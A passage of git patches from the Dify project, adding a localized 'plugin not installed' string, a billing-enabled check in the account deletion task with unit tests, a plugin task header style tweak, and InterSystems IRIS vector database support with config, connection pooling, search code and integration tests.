b/web/i18n/ru-RU/workflow.ts index 66e0c872e3..183c113b20 100644 --- a/web/i18n/ru-RU/workflow.ts +++ b/web/i18n/ru-RU/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Используйте переменную', }, inputVars: 'Входные переменные', + pluginNotInstalled: 'Плагин не установлен', }, start: { required: 'обязательно', diff --git a/web/i18n/sl-SI/workflow.ts b/web/i18n/sl-SI/workflow.ts index a1a534635a..d92d92da4a 100644 --- a/web/i18n/sl-SI/workflow.ts +++ b/web/i18n/sl-SI/workflow.ts @@ -444,6 +444,7 @@ const translation = { input: 'Vhodna vrednost', }, inputVars: 'Vhodne spremenljivke', + pluginNotInstalled: 'Vtičnik ni nameščen', }, start: { outputVars: { diff --git a/web/i18n/th-TH/workflow.ts b/web/i18n/th-TH/workflow.ts index 5107e9a79a..d91461f535 100644 --- a/web/i18n/th-TH/workflow.ts +++ b/web/i18n/th-TH/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'ใช้ตัวแปร', }, inputVars: 'ตัวแปรอินพุต', + pluginNotInstalled: 'ปลั๊กอินไม่ได้ติดตั้ง', }, start: { required: 'ต้องระบุ', diff --git a/web/i18n/tr-TR/workflow.ts b/web/i18n/tr-TR/workflow.ts index 89a299ed8d..b32b0b31e4 100644 --- a/web/i18n/tr-TR/workflow.ts +++ b/web/i18n/tr-TR/workflow.ts @@ -437,6 +437,7 @@ const translation = { input: 'Girdi değeri', }, inputVars: 'Giriş Değişkenleri', + pluginNotInstalled: 'Eklenti yüklü değil', }, start: { required: 'gerekli', diff --git a/web/i18n/uk-UA/workflow.ts b/web/i18n/uk-UA/workflow.ts index 4515e2676a..fe8f5e448f 100644 --- a/web/i18n/uk-UA/workflow.ts +++ b/web/i18n/uk-UA/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Використовуйте змінну', }, inputVars: 'Вхідні змінні', + pluginNotInstalled: 'Плагін не встановлений', }, start: { required: 'обов\'язковий', diff --git a/web/i18n/vi-VN/workflow.ts b/web/i18n/vi-VN/workflow.ts index 63b4291293..b3767ee6e7 100644 --- a/web/i18n/vi-VN/workflow.ts +++ b/web/i18n/vi-VN/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Sử dụng biến', }, inputVars: 'Biến đầu vào', + pluginNotInstalled: 'Plugin chưa được cài đặt', }, start: { required: 'bắt buộc', diff --git a/web/i18n/zh-Hans/workflow.ts b/web/i18n/zh-Hans/workflow.ts index f9e29ef6b0..fd86292252 100644 --- a/web/i18n/zh-Hans/workflow.ts +++ b/web/i18n/zh-Hans/workflow.ts @@ -464,6 +464,7 @@ const translation = { variable: '使用变量', }, inputVars: '输入变量', + pluginNotInstalled: '插件未安装', }, start: { required: '必填', diff --git a/web/i18n/zh-Hant/workflow.ts b/web/i18n/zh-Hant/workflow.ts index 9297ae1317..3da4cc172a 100644 --- a/web/i18n/zh-Hant/workflow.ts +++ b/web/i18n/zh-Hant/workflow.ts @@ -442,6 +442,7 @@ const translation = { variable: '使用變數', }, inputVars: '輸入變數', + pluginNotInstalled: '插件未安裝', }, start: { required: '必填', From 470650d1d78c22e0f45ae10f876aef7addc5d85b Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 10:12:35 +0800 Subject: [PATCH 05/68] fix: fix delete_account_task not check billing enabled (#29577) --- api/tasks/delete_account_task.py | 4 +- .../tasks/test_delete_account_task.py | 112 ++++++++++++++++++ 2 files changed, 115 insertions(+), 1 deletion(-) create mode 100644 api/tests/unit_tests/tasks/test_delete_account_task.py diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() From b7bdd5920bb7f879047ef52d26967bd93091f732 Mon Sep 17 00:00:00 2001 From: Pleasure1234 <3196812536@qq.com> Date: Mon, 15 Dec 2025 02:13:59 +0000 Subject: [PATCH 06/68] fix: add secondary text color to plugin task headers (#29529) --- .../components/plugins/plugin-page/plugin-tasks/index.tsx | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/web/app/components/plugins/plugin-page/plugin-tasks/index.tsx b/web/app/components/plugins/plugin-page/plugin-tasks/index.tsx index 4c37705287..d410c06183 100644 --- a/web/app/components/plugins/plugin-page/plugin-tasks/index.tsx +++ b/web/app/components/plugins/plugin-page/plugin-tasks/index.tsx @@ -187,7 +187,7 @@ const PluginTasks = () => { {/* Running Plugins */} {runningPlugins.length > 0 && ( <> -
+
{t('plugin.task.installing')} ({runningPlugins.length})
@@ -220,7 +220,7 @@ const PluginTasks = () => { {/* Success Plugins */} {successPlugins.length > 0 && ( <> -
+
{t('plugin.task.installed')} ({successPlugins.length})
-
+
From 569c593240fac0d85deb2e45eed365fba22c73d7 Mon Sep 17 00:00:00 2001 From: TomoOkuyama <49631611+TomoOkuyama@users.noreply.github.com> Date: Mon, 15 Dec 2025 11:20:43 +0900 Subject: [PATCH 08/68] feat: Add InterSystems IRIS vector database support (#29480) Co-authored-by: Tomo Okuyama --- .gitignore | 1 + api/configs/middleware/__init__.py | 2 + api/configs/middleware/vdb/iris_config.py | 91 ++++ api/controllers/console/datasets/datasets.py | 1 + api/core/rag/datasource/vdb/iris/__init__.py | 0 .../rag/datasource/vdb/iris/iris_vector.py | 407 ++++++++++++++++++ api/core/rag/datasource/vdb/vector_factory.py | 4 + api/core/rag/datasource/vdb/vector_type.py | 1 + api/pyproject.toml | 1 + api/tests/integration_tests/.env.example | 16 +- .../integration_tests/vdb/iris/__init__.py | 0 .../integration_tests/vdb/iris/test_iris.py | 44 ++ api/uv.lock | 14 + docker/.env.example | 17 +- docker/docker-compose-template.yaml | 20 + docker/docker-compose.yaml | 33 ++ docker/iris/docker-entrypoint.sh | 38 ++ docker/iris/iris-init.script | 11 + 18 files changed, 699 insertions(+), 2 deletions(-) create mode 100644 api/configs/middleware/vdb/iris_config.py create mode 100644 api/core/rag/datasource/vdb/iris/__init__.py create mode 100644 api/core/rag/datasource/vdb/iris/iris_vector.py create mode 100644 api/tests/integration_tests/vdb/iris/__init__.py create mode 100644 api/tests/integration_tests/vdb/iris/test_iris.py create mode 100755 docker/iris/docker-entrypoint.sh create mode 100644 docker/iris/iris-init.script diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..c4390ffaab 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/controllers/console/datasets/datasets.py b/api/controllers/console/datasets/datasets.py index 70b6e932e9..8c4a4467a7 100644 --- a/api/controllers/console/datasets/datasets.py +++ b/api/controllers/console/datasets/datasets.py @@ -230,6 +230,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool VectorType.CLICKZETTA, VectorType.BAIDU, VectorType.ALIBABACLOUD_MYSQL, + VectorType.IRIS, } semantic_methods = {"retrieval_method": [RetrievalMethod.SEMANTIC_SEARCH.value]} diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. +""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. + + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" + cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) + """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). + """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 3a47241293..9573b491a5 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -187,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..263d22195e 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -32,3 +32,4 @@ class VectorType(StrEnum): HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/pyproject.toml b/api/pyproject.toml index 092b5ab9f9..4fbd7433d1 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -216,6 +216,7 @@ vdb = [ "pymochow==2.2.9", "pyobvector~=0.2.17", "qdrant-client==1.9.0", + "intersystems-irispython>=5.1.0", "tablestore==6.3.7", "tcvectordb~=1.6.4", "tidb-vector==0.0.9", diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + 